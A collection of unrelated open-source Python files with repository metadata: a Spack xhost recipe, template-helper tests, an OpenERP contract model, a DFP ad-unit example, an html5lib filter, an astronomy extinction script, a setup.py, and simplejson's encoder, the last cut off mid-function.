|
gpl-2.0
|
wscullin/spack
|
var/spack/repos/builtin/packages/xhost/package.py
|
3
|
1821
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Xhost(AutotoolsPackage):
"""xhost is used to manage the list of host names or user names
allowed to make connections to the X server."""
homepage = "http://cgit.freedesktop.org/xorg/app/xhost"
url = "https://www.x.org/archive/individual/app/xhost-1.0.7.tar.gz"
version('1.0.7', 'de34b4ba5194634dbeb29a1f008f495a')
depends_on('libx11')
depends_on('libxmu')
depends_on('libxau')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build')
depends_on('util-macros', type='build')
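# Illustrative usage note (not part of the original recipe): once this file is in
# a Spack package repository, the package is built like any other Spack package:
#
#     spack install xhost
#     spack spec xhost    # shows the resolved libx11/libxmu/libxau dependencies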
|
lgpl-2.1
|
beni55/olympia
|
apps/reviews/tests/test_helpers.py
|
14
|
4658
|
from nose.tools import eq_
import jingo
from pyquery import PyQuery as pq
import amo.tests
from addons.models import Addon
from amo.urlresolvers import reverse
from reviews.models import ReviewFlag
from reviews.forms import ReviewForm
class HelpersTest(amo.tests.TestCase):
def render(self, s, context={}):
t = jingo.env.from_string(s)
return t.render(context)
def test_stars(self):
s = self.render('{{ num|stars }}', {'num': None})
eq_(s, 'Not yet rated')
doc = pq(self.render('{{ num|stars }}', {'num': 1}))
msg = 'Rated 1 out of 5 stars'
eq_(doc.attr('class'), 'stars stars-1')
eq_(doc.attr('title'), msg)
eq_(doc.text(), msg)
def test_stars_details_page(self):
doc = pq(self.render('{{ num|stars(large=True) }}', {'num': 2}))
eq_(doc('.stars').attr('class'), 'stars large stars-2')
def test_stars_max(self):
doc = pq(self.render('{{ num|stars }}', {'num': 5.3}))
eq_(doc.attr('class'), 'stars stars-5')
def test_reviews_link(self):
a = Addon(average_rating=4, total_reviews=37, id=1, type=1, slug='xx')
s = self.render('{{ reviews_link(myaddon) }}', {'myaddon': a})
eq_(pq(s)('strong').text(), '37 reviews')
# without collection uuid
eq_(pq(s)('a').attr('href'), '/en-US/firefox/addon/xx/#reviews')
# with collection uuid
myuuid = 'f19a8822-1ee3-4145-9440-0a3640201fe6'
s = self.render('{{ reviews_link(myaddon, myuuid) }}',
{'myaddon': a, 'myuuid': myuuid})
eq_(pq(s)('a').attr('href'),
'/en-US/firefox/addon/xx/?collection_uuid=%s#reviews' % myuuid)
z = Addon(average_rating=0, total_reviews=0, id=1, type=1, slug='xx')
s = self.render('{{ reviews_link(myaddon) }}', {'myaddon': z})
eq_(pq(s)('strong').text(), 'Not yet rated')
# with link
u = reverse('addons.reviews.list', args=['xx'])
s = self.render('{{ reviews_link(myaddon, link_to_list=True) }}',
{'myaddon': a})
eq_(pq(s)('a').attr('href'), u)
def test_impala_reviews_link(self):
a = Addon(average_rating=4, total_reviews=37, id=1, type=1, slug='xx')
s = self.render('{{ impala_reviews_link(myaddon) }}', {'myaddon': a})
eq_(pq(s)('a').text(), '(37)')
# without collection uuid
eq_(pq(s)('a').attr('href'), '/en-US/firefox/addon/xx/#reviews')
# with collection uuid
myuuid = 'f19a8822-1ee3-4145-9440-0a3640201fe6'
s = self.render('{{ impala_reviews_link(myaddon, myuuid) }}',
{'myaddon': a, 'myuuid': myuuid})
eq_(pq(s)('a').attr('href'),
'/en-US/firefox/addon/xx/?collection_uuid=%s#reviews' % myuuid)
z = Addon(average_rating=0, total_reviews=0, id=1, type=1, slug='xx')
s = self.render('{{ impala_reviews_link(myaddon) }}', {'myaddon': z})
eq_(pq(s)('b').text(), 'Not yet rated')
# with link
u = reverse('addons.reviews.list', args=['xx'])
s = self.render(
'{{ impala_reviews_link(myaddon, link_to_list=True) }}',
{'myaddon': a})
eq_(pq(s)('a').attr('href'), u)
def test_mobile_reviews_link(self):
def s(a):
return pq(self.render('{{ mobile_reviews_link(myaddon) }}',
{'myaddon': a}))
a = Addon(total_reviews=0, id=1, type=1, slug='xx')
doc = s(a)
eq_(doc('a').attr('href'), reverse('addons.reviews.add', args=['xx']))
u = reverse('addons.reviews.list', args=['xx'])
a = Addon(average_rating=4, total_reviews=37, id=1, type=1, slug='xx')
doc = s(a)
eq_(doc('a').attr('href'), u)
eq_(doc('a').text(), 'Rated 4 out of 5 stars See All 37 Reviews')
a = Addon(average_rating=4, total_reviews=1, id=1, type=1, slug='xx')
doc = s(a)
doc.remove('div')
eq_(doc('a').attr('href'), u)
eq_(doc('a').text(), 'See All Reviews')
def test_report_review_popup(self):
doc = pq(self.render('{{ report_review_popup() }}'))
eq_(doc('.popup.review-reason').length, 1)
for flag, text in ReviewFlag.FLAGS:
eq_(doc('li a[href$=%s]' % flag).text(), text)
eq_(doc('form input[name=note]').length, 1)
def test_edit_review_form(self):
doc = pq(self.render('{{ edit_review_form() }}'))
eq_(doc('#review-edit-form').length, 1)
eq_(doc('p.req').length, 1)
for name in ReviewForm().fields.keys():
eq_(doc('[name=%s]' % name).length, 1)
|
bsd-3-clause
|
mvaled/OpenUpgrade
|
addons/hr_contract/hr_contract.py
|
302
|
5377
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
class hr_employee(osv.osv):
_name = "hr.employee"
_description = "Employee"
_inherit = "hr.employee"
def _get_latest_contract(self, cr, uid, ids, field_name, args, context=None):
res = {}
obj_contract = self.pool.get('hr.contract')
for emp in self.browse(cr, uid, ids, context=context):
contract_ids = obj_contract.search(cr, uid, [('employee_id','=',emp.id),], order='date_start', context=context)
if contract_ids:
res[emp.id] = contract_ids[-1:][0]
else:
res[emp.id] = False
return res
def _contracts_count(self, cr, uid, ids, field_name, arg, context=None):
Contract = self.pool['hr.contract']
return {
employee_id: Contract.search_count(cr, SUPERUSER_ID, [('employee_id', '=', employee_id)], context=context)
for employee_id in ids
}
_columns = {
'manager': fields.boolean('Is a Manager'),
'medic_exam': fields.date('Medical Examination Date'),
'place_of_birth': fields.char('Place of Birth'),
'children': fields.integer('Number of Children'),
'vehicle': fields.char('Company Vehicle'),
'vehicle_distance': fields.integer('Home-Work Dist.', help="In kilometers"),
'contract_ids': fields.one2many('hr.contract', 'employee_id', 'Contracts'),
'contract_id': fields.function(_get_latest_contract, string='Contract', type='many2one', relation="hr.contract", help='Latest contract of the employee'),
'contracts_count': fields.function(_contracts_count, type='integer', string='Contracts'),
}
class hr_contract_type(osv.osv):
_name = 'hr.contract.type'
_description = 'Contract Type'
_columns = {
'name': fields.char('Contract Type', required=True),
}
class hr_contract(osv.osv):
_name = 'hr.contract'
_description = 'Contract'
_columns = {
'name': fields.char('Contract Reference', required=True),
'employee_id': fields.many2one('hr.employee', "Employee", required=True),
'department_id': fields.related('employee_id','department_id', type='many2one', relation='hr.department', string="Department", readonly=True),
'type_id': fields.many2one('hr.contract.type', "Contract Type", required=True),
'job_id': fields.many2one('hr.job', 'Job Title'),
'date_start': fields.date('Start Date', required=True),
'date_end': fields.date('End Date'),
'trial_date_start': fields.date('Trial Start Date'),
'trial_date_end': fields.date('Trial End Date'),
'working_hours': fields.many2one('resource.calendar','Working Schedule'),
'wage': fields.float('Wage', digits=(16,2), required=True, help="Basic Salary of the employee"),
'advantages': fields.text('Advantages'),
'notes': fields.text('Notes'),
'permit_no': fields.char('Work Permit No', required=False, readonly=False),
'visa_no': fields.char('Visa No', required=False, readonly=False),
'visa_expire': fields.date('Visa Expire Date'),
}
def _get_type(self, cr, uid, context=None):
type_ids = self.pool.get('hr.contract.type').search(cr, uid, [('name', '=', 'Employee')])
return type_ids and type_ids[0] or False
_defaults = {
'date_start': lambda *a: time.strftime("%Y-%m-%d"),
'type_id': _get_type
}
def onchange_employee_id(self, cr, uid, ids, employee_id, context=None):
if not employee_id:
return {'value': {'job_id': False}}
emp_obj = self.pool.get('hr.employee').browse(cr, uid, employee_id, context=context)
job_id = False
if emp_obj.job_id:
job_id = emp_obj.job_id.id
return {'value': {'job_id': job_id}}
def _check_dates(self, cr, uid, ids, context=None):
for contract in self.read(cr, uid, ids, ['date_start', 'date_end'], context=context):
if contract['date_start'] and contract['date_end'] and contract['date_start'] > contract['date_end']:
return False
return True
_constraints = [
(_check_dates, 'Error! Contract start-date must be less than contract end-date.', ['date_start', 'date_end'])
]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
donspaulding/adspygoogle
|
examples/adspygoogle/dfp/v201302/inventory_service/create_ad_units.py
|
3
|
2804
|
#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example creates new ad units.
To determine which ad units exist, run get_all_ad_units.py
Tags: InventoryService.createAdUnits
"""
__author__ = '[email protected] (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.common import Utils
def main(client, parent_id):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v201302')
# Create ad unit size.
ad_unit_size = {
'size': {
'width': '300',
'height': '250'
},
'environmentType': 'BROWSER'
}
# Create ad unit objects.
web_ad_unit = {
'name': 'Web_ad_unit_%s' % Utils.GetUniqueName(),
'parentId': parent_id,
'description': 'Web ad unit description.',
'targetWindow': 'BLANK',
'targetPlatform': 'WEB',
'adUnitSizes': [ad_unit_size]
}
mobile_ad_unit = {
'name': 'Mobile_ad_unit_%s' % Utils.GetUniqueName(),
'parentId': parent_id,
'description': 'Mobile ad unit description.',
'targetWindow': 'BLANK',
'targetPlatform': 'MOBILE',
'mobilePlatform': 'APPLICATION',
'adUnitSizes': [ad_unit_size]
}
# Add ad units.
ad_units = inventory_service.CreateAdUnits([web_ad_unit, mobile_ad_unit])
# Display results.
for ad_unit in ad_units:
print ('Ad unit with ID \'%s\', name \'%s\', and target platform \'%s\' '
'was created.' % (ad_unit['id'], ad_unit['name'],
ad_unit['targetPlatform']))
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
# Get the Network Service.
network_service = dfp_client.GetService('NetworkService', version='v201302')
# Set the parent ad unit's ID for all ad units to be created under.
parent_id = network_service.GetCurrentNetwork()[0]['effectiveRootAdUnitId']
main(dfp_client, parent_id)
|
apache-2.0
|
Darkmoth/python-django-4
|
Thing/env/Lib/site-packages/pip/_vendor/html5lib/filters/inject_meta_charset.py
|
1730
|
2746
|
from __future__ import absolute_import, division, unicode_literals
from . import _base
class Filter(_base.Filter):
def __init__(self, source, encoding):
_base.Filter.__init__(self, source)
self.encoding = encoding
def __iter__(self):
state = "pre_head"
meta_found = (self.encoding is None)
pending = []
for token in _base.Filter.__iter__(self):
type = token["type"]
if type == "StartTag":
if token["name"].lower() == "head":
state = "in_head"
elif type == "EmptyTag":
if token["name"].lower() == "meta":
# replace charset with actual encoding
has_http_equiv_content_type = False
for (namespace, name), value in token["data"].items():
if namespace is not None:
continue
elif name.lower() == 'charset':
token["data"][(namespace, name)] = self.encoding
meta_found = True
break
elif name == 'http-equiv' and value.lower() == 'content-type':
has_http_equiv_content_type = True
else:
if has_http_equiv_content_type and (None, "content") in token["data"]:
token["data"][(None, "content")] = 'text/html; charset=%s' % self.encoding
meta_found = True
elif token["name"].lower() == "head" and not meta_found:
# insert meta into empty head
yield {"type": "StartTag", "name": "head",
"data": token["data"]}
yield {"type": "EmptyTag", "name": "meta",
"data": {(None, "charset"): self.encoding}}
yield {"type": "EndTag", "name": "head"}
meta_found = True
continue
elif type == "EndTag":
if token["name"].lower() == "head" and pending:
# insert meta into head (if necessary) and flush pending queue
yield pending.pop(0)
if not meta_found:
yield {"type": "EmptyTag", "name": "meta",
"data": {(None, "charset"): self.encoding}}
while pending:
yield pending.pop(0)
meta_found = True
state = "post_head"
if state == "in_head":
pending.append(token)
else:
yield token
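# Illustrative usage sketch (not part of the original module): the filter wraps
# any iterable of html5lib-style token dicts (for example, the output of a tree
# walker) and yields the same stream with a charset <meta> tag ensured, so that
# a serializer consuming it emits a document declaring its encoding.
#
#     filtered = Filter(token_stream, "utf-8")   # token_stream is assumed given
#     for token in filtered:
#         pass   # hand tokens on to a serializer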
|
gpl-2.0
|
deapplegate/wtgpipeline
|
cal_extinctions.py
|
1
|
2531
|
def calc_EBV(coord_in_ra,coord_in_dec):
#coord_in_ra='12:51:26.28'
#coord_in_dec='27:07:42.'
coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING
g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude
spt = re.split('\:',str(g.lat))
#print spt, abs(float(spt[0])), float(spt[1])/60.
gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallat
#print g.long
spt = re.split('\:',str(g.long))
#print spt
gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallong
#coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000')
output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y ipath=/nfs/slac/g/ki/ki03/xoc/pkelly/DUST/maps')
spt = re.split('\s',output)
#print spt
EBV = spt[-1]
#print EBV, float(coord_in_ra), float(coord_in_dec)
return EBV
#add E(B-V) to ldac table
import re, commands, sys, bashreader, os
from ephem import *
ppid = os.getppid()
dict = bashreader.parseFile('progs.ini')
table = sys.argv[1]
import time
tempfile = '/tmp/outkey'
ebvfile = '/tmp/outebv'
os.system('rm ' + ebvfile)
command = "ldactoasc -b -i " + table + " -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > " + ebvfile
print command
os.system(command)
print 'done'
tempmap = '/tmp/map' + str(ppid)
os.system('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y ipath=/nfs/slac/g/ki/ki03/xoc/pkelly/DUST/maps infile=' + ebvfile + ' outfile=' + tempmap + ' noloop=y')
raw_input()
list = []
import re
outkey=open(tempfile,'w')
lines = open(ebvfile,'r').readlines()
# READ IN COLUMN INFO
lineindex = 0
timehold = time.time()
for line in lines:
tt = re.split('\s+',line)
ra = float(tt[0])
dec = float(tt[1])
EBV = calc_EBV(float(ra),float(dec))
outkey.write(str(EBV) + '\n')
lineindex += 1
if lineindex % 1000 == 0:
print lineindex, len(lines), time.time() - timehold
timehold = time.time()
outkey.close()
command = "asctoldac -i " + tempfile + " -o " + tempfile + ".cat -c " + dict['photconf'] + "/EBV.conf -t OBJECTS "
os.system(command)
command = "ldacjoinkey -o test -i " + table + " -p " + tempfile + ".cat -t OBJECTS -k EBV"
os.system(command)
|
mit
|
chintal/cocomo
|
setup.py
|
1
|
1153
|
#!/usr/bin/env python
import os
from setuptools import setup
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="cocomo",
version="0.3",
author="Chintalagiri Shashank",
author_email="[email protected]",
description="Simple wrapper around SLOCCount",
license="MIT",
keywords="utilities",
url="https://github.com/chintal/cocomo",
packages=['cocomo'],
long_description=read('README.rst'),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Software Development",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Intended Audience :: Developers",
"Natural Language :: English",
"Operating System :: OS Independent",
],
platforms='any',
entry_points={
'console_scripts': ['cocomo=cocomo.cocomo:main'],
}
)
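# Illustrative note (not part of the original setup script): installing the
# package, for example with "pip install ." from this directory, registers a
# `cocomo` console script via the entry_points declaration above, dispatching
# to cocomo.cocomo:main:
#
#     pip install .
#     cocomo          # runs cocomo.cocomo:main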
|
mit
|
renatogames2/namebench
|
nb_third_party/simplejson/encoder.py
|
296
|
18214
|
"""Implementation of JSONEncoder
"""
import re
from decimal import Decimal
def _import_speedups():
try:
from simplejson import _speedups
return _speedups.encode_basestring_ascii, _speedups.make_encoder
except ImportError:
return None, None
c_encode_basestring_ascii, c_make_encoder = _import_speedups()
from simplejson.decoder import PosInf
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
ESCAPE_DCT = {
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
#ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i))
ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
FLOAT_REPR = repr
def encode_basestring(s):
"""Return a JSON representation of a Python string
"""
if isinstance(s, str) and HAS_UTF8.search(s) is not None:
s = s.decode('utf-8')
def replace(match):
return ESCAPE_DCT[match.group(0)]
return u'"' + ESCAPE.sub(replace, s) + u'"'
def py_encode_basestring_ascii(s):
"""Return an ASCII-only JSON representation of a Python string
"""
if isinstance(s, str) and HAS_UTF8.search(s) is not None:
s = s.decode('utf-8')
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
#return '\\u{0:04x}'.format(n)
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
#return '\\u{0:04x}\\u{1:04x}'.format(s1, s2)
return '\\u%04x\\u%04x' % (s1, s2)
return '"' + str(ESCAPE_ASCII.sub(replace, s)) + '"'
encode_basestring_ascii = (
c_encode_basestring_ascii or py_encode_basestring_ascii)
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8', default=None,
use_decimal=False):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is true, the output is guaranteed to be str
objects with all incoming unicode characters escaped. If
ensure_ascii is false, the output will be unicode object.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
If use_decimal is true (not the default), ``decimal.Decimal`` will
be supported directly by the encoder. For the inverse, decode JSON
with ``parse_float=decimal.Decimal``.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.use_decimal = use_decimal
if isinstance(indent, (int, long)):
indent = ' ' * indent
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
if default is not None:
self.default = default
self.encoding = encoding
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, o)
"""
raise TypeError(repr(o) + " is not JSON serializable")
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> from simplejson import JSONEncoder
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8')):
o = o.decode(_encoding)
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
if self.ensure_ascii:
return ''.join(chunks)
else:
return u''.join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
if self.encoding != 'utf-8':
def _encoder(o, _orig_encoder=_encoder, _encoding=self.encoding):
if isinstance(o, str):
o = o.decode(_encoding)
return _orig_encoder(o)
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=PosInf, _neginf=-PosInf):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on
# the internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
key_memo = {}
if (_one_shot and c_make_encoder is not None
and not self.indent and not self.sort_keys):
_iterencode = c_make_encoder(
markers, self.default, _encoder, self.indent,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, self.allow_nan, key_memo, self.use_decimal)
else:
_iterencode = _make_iterencode(
markers, self.default, _encoder, self.indent, floatstr,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, _one_shot, self.use_decimal)
try:
return _iterencode(o, 0)
finally:
key_memo.clear()
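# Illustrative sketch (not part of the original module): extending the encoder
# for an otherwise unserializable type by overriding ``default()``, as described
# in the JSONEncoder class docstring above. The SetEncoder name is hypothetical.
#
#     class SetEncoder(JSONEncoder):
#         def default(self, o):
#             if isinstance(o, set):
#                 return sorted(o)               # encode sets as sorted JSON arrays
#             return JSONEncoder.default(self, o)
#
#     SetEncoder().encode({"tags": set(["b", "a"])})   # -> '{"tags": ["a", "b"]}'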
class JSONEncoderForHTML(JSONEncoder):
"""An encoder that produces JSON safe to embed in HTML.
To embed JSON content in, say, a script tag on a web page, the
characters &, < and > should be escaped. They cannot be escaped
    with the usual entities (e.g. &amp;) because they are not expanded
within <script> tags.
"""
def encode(self, o):
# Override JSONEncoder.encode because it has hacks for
# performance that make things more complicated.
chunks = self.iterencode(o, True)
if self.ensure_ascii:
return ''.join(chunks)
else:
return u''.join(chunks)
def iterencode(self, o, _one_shot=False):
chunks = super(JSONEncoderForHTML, self).iterencode(o, _one_shot)
for chunk in chunks:
chunk = chunk.replace('&', '\\u0026')
chunk = chunk.replace('<', '\\u003c')
chunk = chunk.replace('>', '\\u003e')
yield chunk
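# Illustrative sketch (not part of the original module): embedding encoder output
# directly in an inline <script> block, the use case the class docstring above
# describes. The ``&``, ``<`` and ``>`` characters come out as ``\u0026``,
# ``\u003c`` and ``\u003e``, so the payload cannot terminate the script element.
#
#     payload = JSONEncoderForHTML().encode({"msg": "<b>fish & chips</b>"})
#     html = "<script>var data = %s;</script>" % payload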
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
_use_decimal,
## HACK: hand-optimized bytecode; turn globals into locals
False=False,
True=True,
ValueError=ValueError,
basestring=basestring,
Decimal=Decimal,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
long=long,
str=str,
tuple=tuple,
):
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (_indent * _current_indent_level)
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, basestring):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, (int, long)):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
elif _use_decimal and isinstance(value, Decimal):
yield buf + str(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (_indent * _current_indent_level)
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (_indent * _current_indent_level)
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = dct.items()
items.sort(key=lambda kv: kv[0])
else:
items = dct.iteritems()
for key, value in items:
if isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, (int, long)):
key = str(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, basestring):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, (int, long)):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
elif _use_decimal and isinstance(value, Decimal):
yield str(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (_indent * _current_indent_level)
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, basestring):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
elif isinstance(o, (list, tuple)):
for chunk in _iterencode_list(o, _current_indent_level):
yield chunk
elif isinstance(o, dict):
for chunk in _iterencode_dict(o, _current_indent_level):
yield chunk
elif _use_decimal and isinstance(o, Decimal):
yield str(o)
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
